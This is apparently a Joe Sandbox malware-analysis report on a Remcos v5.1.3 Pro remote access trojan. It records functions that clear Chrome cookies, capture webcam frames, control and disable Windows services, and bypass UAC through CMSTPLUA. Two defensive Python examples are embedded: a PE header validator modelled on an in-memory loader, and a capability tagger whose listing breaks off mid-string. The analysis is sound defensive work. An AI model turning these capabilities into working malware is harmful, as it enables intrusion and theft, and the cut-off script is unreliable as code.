                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                    • UserProfile, xrefs: 0040BAE8
                                    • [Chrome Cookies not found], xrefs: 0040BB3C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                    • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                    • Opcode Fuzzy Hash: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
                                    • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                    APIs
                                    • AllocConsole.KERNEL32(00475338), ref: 0041CE35
                                    • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Console$AllocOutputShowWindow
                                    • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                    • API String ID: 2425139147-2212855755
                                    • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                    • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                    • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                    • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002), ref: 004433FA
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                    • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,0044338B,00000003,PkGNG,0044332B,00000003,0046E958,0000000C,00443482,00000003,00000002,00000000,PkGNG), ref: 00443430
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$PkGNG$mscoree.dll
                                    • API String ID: 4061214504-213444651
                                    • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                    • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                    • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                    • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                    APIs
                                    • __allrem.LIBCMT ref: 0043ACE9
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                    • __allrem.LIBCMT ref: 0043AD1C
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                    • __allrem.LIBCMT ref: 0043AD51
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 1992179935-0
                                    • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                    • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                    • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                    • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                    APIs
                                    • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleep
                                    • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                    • API String ID: 3469354165-3054508432
                                    • Opcode ID: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                    • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                    • Opcode Fuzzy Hash: 320c67068b3b288db2e993e88ff11ad854d39230f6bbd9045a2096c25c2dffa0
                                    • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                    APIs
                                      • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                    • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 00411E04
                                      • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00411CEE
                                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 00411E4B
                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 00411E52
                                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411F65
                                      • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,00000000), ref: 00412122
                                      • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00412129
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 3950776272-0
                                    • Opcode ID: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                    • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                    • Opcode Fuzzy Hash: 0997a6c101f2dd0e8850336bac1793923a5345a50e97098554ef69f44a303648
                                    • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
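The SetLastError values in the record above are the standard Win32 codes ERROR_INVALID_DATA (0xD), ERROR_BAD_EXE_FORMAT (0xC1), ERROR_OUTOFMEMORY (0xE) and ERROR_DLL_INIT_FAILED (0x45A), set around a GetNativeSystemInfo call (page size), a VirtualAlloc whose argument list carries 0x3000 (MEM_COMMIT|MEM_RESERVE) and 0x40 (PAGE_EXECUTE_READWRITE), and a heap allocation. That is the shape of an in-memory PE loader that validates headers, reserves RWX space for the image and fails with exactly those codes (the pattern matches the open-source MemoryModule loader often embedded in such samples), and it fits the "Injects a PE file into a foreign processes" verdict. That reading is an inference from the API pattern; the report itself does not name the loader. The Python below is an added example, not the sample's code and not Joe Sandbox output: it performs the header checks such a loader makes before mapping (DOS and PE signatures, machine type against the host, optional-header magic and alignment, section table against the buffer) and returns the same Win32 error code for each failure, exercised on a minimal constructed PE32 image. The 4096-byte page size is an assumption standing in for the GetNativeSystemInfo result.

```python
"""Header checks an in-memory PE loader performs before mapping an image.

Added example for this report; not the sample's code. The Win32 error codes
are the SetLastError values seen in the loader-like function above.
"""
import struct

ERROR_INVALID_DATA = 0x0D      # buffer too short for what the headers claim
ERROR_BAD_EXE_FORMAT = 0xC1    # signatures, machine type or alignment wrong
IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PAGE_SIZE = 0x1000             # assumed; a real loader takes dwPageSize from GetNativeSystemInfo


def validate_pe_for_inmemory_load(buf, host_machine=IMAGE_FILE_MACHINE_I386):
    """Return (0, info) if the image passes the pre-mapping checks, else (win32_error, reason)."""
    if len(buf) < 64:
        return ERROR_INVALID_DATA, "shorter than IMAGE_DOS_HEADER"
    if buf[:2] != b"MZ":
        return ERROR_BAD_EXE_FORMAT, "missing MZ signature"
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if e_lfanew + 24 > len(buf):
        return ERROR_INVALID_DATA, "e_lfanew points past the buffer"
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return ERROR_BAD_EXE_FORMAT, "missing PE signature"
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    if machine != host_machine:
        return ERROR_BAD_EXE_FORMAT, f"machine 0x{machine:x} does not match host 0x{host_machine:x}"
    opt_off = e_lfanew + 24
    if opt_size < 64 or opt_off + opt_size > len(buf):
        return ERROR_INVALID_DATA, "optional header truncated"
    magic, = struct.unpack_from("<H", buf, opt_off)
    if magic not in (0x10B, 0x20B):                       # PE32 / PE32+
        return ERROR_BAD_EXE_FORMAT, f"unknown optional header magic 0x{magic:x}"
    # SectionAlignment and SizeOfImage sit at the same offsets in PE32 and PE32+.
    section_alignment, = struct.unpack_from("<I", buf, opt_off + 32)
    size_of_image, = struct.unpack_from("<I", buf, opt_off + 56)
    if section_alignment == 0 or section_alignment & (section_alignment - 1):
        return ERROR_BAD_EXE_FORMAT, "SectionAlignment is not a power of two"
    sec_off = opt_off + opt_size
    if sec_off + 40 * nsections > len(buf):
        return ERROR_INVALID_DATA, "section table truncated"
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", buf, sec_off + 40 * i)
        sname = name.rstrip(b"\0")
        if raw_size and raw_ptr + raw_size > len(buf):
            return ERROR_INVALID_DATA, f"section {sname!r} raw data lies past the buffer"
        if va + max(vsize, raw_size) > size_of_image:
            return ERROR_BAD_EXE_FORMAT, f"section {sname!r} extends past SizeOfImage"
    # Space the loader would reserve with VirtualAlloc: SizeOfImage rounded up to whole pages.
    alloc_bytes = -(-size_of_image // PAGE_SIZE) * PAGE_SIZE
    return 0, {"machine": machine, "sections": nsections,
               "size_of_image": size_of_image, "alloc_bytes": alloc_bytes}


def build_minimal_pe(machine=IMAGE_FILE_MACHINE_I386):
    """Constructed sample: a one-section PE32 image (headers plus int3 filler, no real code)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    file_hdr = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                 # PE32 magic
    struct.pack_into("<I", opt, 32, 0x1000)               # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)                # FileAlignment
    struct.pack_into("<I", opt, 56, 0x2000)               # SizeOfImage
    struct.pack_into("<I", opt, 60, 0x200)                # SizeOfHeaders
    section = struct.pack("<8sIIIIIIHHI", b".text", 0x100, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt) + section
    return headers.ljust(0x200, b"\0") + b"\xCC" * 0x200  # raw .text at file offset 0x200


if __name__ == "__main__":
    cases = [("valid", build_minimal_pe()),
             ("x64 image on x86 host", build_minimal_pe(IMAGE_FILE_MACHINE_AMD64)),
             ("truncated", build_minimal_pe()[:0x300])]
    for label, img in cases:
        print(label, validate_pe_for_inmemory_load(img))
```

The same four error codes appearing together with a GetNativeSystemInfo call and an RWX VirtualAlloc are a usable static signature for this loader style regardless of the payload it carries; the Remcos module this sample unpacks is only one such payload.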
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __cftoe
                                    • String ID:
                                    • API String ID: 4189289331-0
                                    • Opcode ID: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                    • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                    • Opcode Fuzzy Hash: 30f97a14dd6f87c9245b8e0b778041a74f07a421c1ac77e9beff42b74887127b
                                    • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                    • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                    • String ID:
                                    • API String ID: 493672254-0
                                    • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                    • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                    • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __alldvrm$_strrchr
                                    • String ID: PkGNG
                                    • API String ID: 1036877536-263838557
                                    • Opcode ID: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                    • Instruction ID: 8ce1af842cd152cb2b2428f5d584a25f6c9224aafe101b92c03b71ca88d34985
                                    • Opcode Fuzzy Hash: 8f78adc186be73fa66820e99e070c83f6be0ee509df7c4dfd67e0dde8c439993
                                    • Instruction Fuzzy Hash: 87A156729846829FF721CF58C8817AEBBA5FF15314F2841AFE8859B381D27C8C51C75A
                                    APIs
                                    • GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • _free.LIBCMT ref: 004482CC
                                    • _free.LIBCMT ref: 004482F4
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                    • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • _abort.LIBCMT ref: 00448313
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$_free$_abort
                                    • String ID:
                                    • API String ID: 3160817290-0
                                    • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                    • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                    • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                    • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                    • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                    • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                    • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                    • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                    • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                    • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                    • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                    • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
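The service records above read more clearly once their raw argument values are decoded: the three ControlService functions pass dwControl 1, 2 and 3 (SERVICE_CONTROL_STOP, SERVICE_CONTROL_PAUSE, SERVICE_CONTROL_CONTINUE), the ChangeServiceConfigW function passes dwStartType 4 (SERVICE_DISABLED), and the OpenServiceW calls request the matching access rights (0x2 SERVICE_CHANGE_CONFIG, 0x20 SERVICE_STOP, 0x40 SERVICE_PAUSE_CONTINUE). Together they are a remotely driven stop/pause/resume/disable capability over arbitrary services. The Python below is an added example, not part of this report and not Joe Sandbox code: it parses records in the page's own rendering (the "Api.MODULE(args), ref: addr" bullets, the "$"-joined "String ID:" line and the "Opcode ID:" line, with "Instruction Fuzzy Hash:" closing each record), decodes those constants, and also tags the UAC-bypass record (CoGetObject beside the ucmCMLuaUtil debug strings), the Chrome cookie deletion, the webcam strings and the Remcos version banner from earlier on this page. The embedded sample text is copied from those records; the constant tables are documented Win32 values rather than report data, and the record boundary rule and tag names are this example's own choices.

```python
"""Tag Joe Sandbox 'IDA Plugin' function records with the capability they imply.

Added example for this report page; not part of Joe Sandbox or of the sample.
"""
import re

API_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[\w:~@?$]+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Documented Win32 constants used to decode raw argument values (not data from the report).
SERVICE_ACCESS = {0x2: "SERVICE_CHANGE_CONFIG", 0x20: "SERVICE_STOP", 0x40: "SERVICE_PAUSE_CONTINUE"}
SERVICE_CONTROL = {1: "STOP", 2: "PAUSE", 3: "CONTINUE", 4: "INTERROGATE"}
SERVICE_START = {0: "BOOT_START", 1: "SYSTEM_START", 2: "AUTO_START", 3: "DEMAND_START", 4: "DISABLED"}


def _hexarg(args, idx):
    """idx-th argument as int, or None when it is '?' or missing (stack garbage is common)."""
    try:
        return int(args[idx], 16)
    except (IndexError, ValueError):
        return None


def parse_records(text):
    """Yield one dict per record: apis [(name, module, args, ref)], strings, opcode_id."""
    rec = {"apis": [], "strings": [], "opcode_id": None}
    for line in text.splitlines():
        body = line.strip().lstrip("•").strip()
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in (m.group("args") or "").split(",")]
            rec["apis"].append((m.group("api"), m.group("mod"), args, m.group("ref")))
        elif body.startswith("String ID:"):
            # '$' separates strings; a literal '$' (CONOUT$) only yields an empty piece.
            rec["strings"] += [s.strip() for s in body[len("String ID:"):].split("$") if s.strip()]
        elif body.startswith("Opcode ID:"):
            rec["opcode_id"] = body[len("Opcode ID:"):].strip()[:12]
        elif body.startswith("Instruction Fuzzy Hash:"):
            yield rec
            rec = {"apis": [], "strings": [], "opcode_id": None}


def tag_record(rec):
    """Capability tags implied by a record's API calls and strings."""
    tags = []
    apis = {name for name, _, _, _ in rec["apis"]}
    strs = " ".join(rec["strings"])
    if "CoGetObject" in apis and "ucmCMLuaUtil" in strs:
        tags.append("uac-bypass:CMSTPLUA-ICMLuaUtil-ShellExec")
    if "DeleteFileA" in apis and "Chrome" in strs and "Cookies" in strs:
        tags.append("browser-data-wipe:chrome-cookies")
    if {"OpenCamera", "GetFrame"} <= set(rec["strings"]):
        tags.append("webcam-capture")
    m = re.search(r"Remcos v\s*(\d[\d.]*(?:\s+\w+)?)", strs)
    if m:
        tags.append("remcos-banner:" + m.group(1))
    for name, _, args, _ in rec["apis"]:
        if name == "OpenServiceW" and _hexarg(args, 2) in SERVICE_ACCESS:
            tags.append("service-open:" + SERVICE_ACCESS[_hexarg(args, 2)])
        elif name == "ControlService":
            code = _hexarg(args, 1)
            label = "?" if code is None else SERVICE_CONTROL.get(code, f"0x{code:x}")
            tags.append("service-control:" + label)
        elif name == "ChangeServiceConfigW":
            start = _hexarg(args, 2)
            tags.append("service-config:start=" + SERVICE_START.get(start, str(start)))
    return tags


def tag_text(text):
    """[(opcode_id prefix, tags)] for every record in the text."""
    return [(r["opcode_id"], tag_record(r)) for r in parse_records(text)]


# Constructed input: record fragments copied from this report page.
SAMPLE = r"""
• CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\keHuNxIumw.exe), ref: 0040760B
  • Part of subcall function 00407538: CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
• String ID: C:\Users\user\AppData\Roaming\keHuNxIumw.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
• Opcode ID: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
• Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
• GetLastError.KERNEL32 ref: 0040BB22
• String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
• Opcode ID: d4592947abf79dc324386ffcaf4b9b591dee499912662422a1d7ea612805fe04
• Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
• AllocConsole.KERNEL32(00475338), ref: 0041CE35
• String ID: Remcos v$5.1.3 Pro$CONOUT$
• Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
• Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
• Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
• Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
• Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
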